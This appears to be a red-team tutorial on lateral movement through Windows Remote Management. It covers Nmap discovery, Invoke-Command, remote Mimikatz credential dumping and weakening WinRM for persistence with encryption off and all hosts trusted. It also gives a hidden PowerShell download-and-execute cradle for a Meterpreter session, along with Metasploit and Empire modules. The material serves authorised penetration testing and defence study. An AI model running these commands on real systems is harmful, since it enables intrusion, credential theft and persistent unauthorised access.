WinRM stands for Windows Remote Management and is a service that allows administrators to perform management tasks on systems remotely. Communication is performed via HTTP (5985) or HTTPS SOAP (5986) and support Kerberos and NTLM authentication by default and Basic authentication. Usage of this service requires administrator level credentials.

In a red team scenario if local administrator access has been achieved then these credentials can be used for lateral movement inside the network if  WinRM is used for management of servers.


Hosts with port 5985 open have the WinRM service running. A simple Nmap scan can be used to determine these hosts.

nmap -p 5985 -sV
WinRM - Port Discovery

WinRM – Port Discovery

If port 5985 is open but port 5986 is closed this means that the WinRM service is configured to accept connections over HTTP only and encryption is not enabled.

WinRM - Ports

WinRM – Ports

From a system that has already local administrator access and these privileges are shared with the target system the PowerShell Invoke-Command can be used for command execution over the WinRM service.

Invoke-Command -ComputerName TARGET -ScriptBlock { dir c:\ }
WinRM - Command Execution

WinRM – Command Execution

Mimikatz can also executed remotely for retrieval of credentials stored in memory and without dropping any binary into disk.

Import-Module ./Invoke-Mimikatz.ps1
Invoke-Mimikatz -ComputerName TARGET
WinRM - Mimikatz

WinRM – Mimikatz

These credentials can then be used to access other systems which can lead possibly to domain escalation.

For systems that don’t run WinRM it is possible to enable and configure this service for persistence by using a legitimate Windows service. The following command will enable WinRM.

Enable-PSRemoting -Force
WinRM - Enable the Service

WinRM – Enable the Service

By default it might not be possible to connect to another system over WinRM and additional configuration might needed. The following commands will assist to configure the service properly for HTTP access from any host.

winrm quickconfig
winrm set winrm/config/Client @{AllowUnencrypted = "true"}
Set-Item WSMan:localhost\client\trustedhosts -value *

Dave Hardy has written a great post about PowerShell PSRemoting Pwnage which contains additional commands. Alternatively WinRM can be configured from the Local Group Policy.

WinRM - Local Group Policy

WinRM – Local Group Policy


Windows Remote Shell (WinRS) is a command line tool that is part of Windows 2008 and later. If WinRM is enabled this utility can be used to execute commands on a host remotely. The cmd argument will establish a new shell over command prompt.

winrs -r:http://WIN-2NE38K15TGH/wsman "cmd"


Alternatively instead of a shell command prompt commands can be executed in order to perform a silent recon on the target.

winrs -r:http://WIN-2NE38K15TGH/wsman "net localgroup administrators"
WinRS - Command Execution

WinRS – Command Execution

It is also possible to upgrade the Windows Remote Shell access to a Meterpreter session via the Metasploit web delivery module. The module will generate a payload which will be hosted locally and will generate the PowerShell command that needs to be executed on the target.

use multi/script/web_delivery
WinRS - Metasploit Web Delivery

WinRS – Metasploit Web Delivery

Executing the PowerShell command from a system that is already connected via WinRS will download and execute the arbitrary code.

powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$h=new-object net.webclient;$h.proxy=[Net.WebRequest]::GetSystemWebProxy();$h.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $h.downloadstring('');
WinRS - Execute PowerShell Command

WinRS – Execute PowerShell Command

A Meterpreter session will open which will provide more flexibility in regards to post exploitation activities.

WinRS - Metasploit Meterpreter

WinRS – Metasploit Meterpreter

Interaction with the new system can be achieved with the command sessions and the associated session number.

WinRS - Meterpreter Session

WinRS – Meterpreter Session


Metasploit Framework has several modules which can be utilized for the discovery of hosts that have the WinRM service enabled, discovery of credentials for service authentication and for executing arbitrary commands and code. The following module can discover systems with WinRM service enabled and their supporting authentication protocols.

Metasploit - WinRM Auth Methods

Metasploit – WinRM Auth Methods

If local administrator credentials have been obtained then these credentials can be used to authenticate with other hosts via the WinRM service. The following module can determine if local administrator credentials are valid for other systems.

Metasploit - WinRM Discovery of Credentials

Metasploit – WinRM Discovery of Credentials

Metasploit has also a module which can execute arbitrary commands over the WinRM service. This module requires local administrator credentials, the domain and the target host.

Metasploit - WinRM Command Execution

Metasploit – WinRM Command Execution

The output of the command will be returned:

Metasploit - WinRM Command Output

Metasploit – WinRM Command Output

Arbitrary code execution is also possible over WinRM and the following module. The module requires local administrator credentials and the list of hosts that the code will executed. This module can be used for lateral movement purposes into hosts that share the same local administrator account.

Metasploit - WinRM Code Execution Module Configuration

Metasploit – WinRM Code Execution Module Configuration

Upon exploitation the module will attempt to modify the PowerShell execution policy to allow execution of unsigned scripts. Then a PowerShell script will be written into disk and executed automatically in order to return a Meterpreter session. The module will also attempt to migrate into a SYSTEM level process to avoid loss of the shell due to time limit restriction of WinRS.

Metasploit - WinRM Code Execution

Metasploit – WinRM Code Execution


For engagements that utilize Empire there is a PowerShell module which can execute code remotely over WinRM in order to expand access inside a network. Requirements for usage of this module are: local administrator credentials, a listener, an agent and a target host.

usemodule lateral_movement/invoke_psremoting 
Empire - PSRemoting

Empire – PSRemoting

The list of active agents can be retrieved with the command agents. The following command will interact with the new agent X5DACN91.

Empire - List of Agents

Empire – List of Agents

Post exploitation commands can be executed on the host that has been compromised through the WinRM service.

Empire - Command Execution via WinRM

Empire – Command Execution via WinRM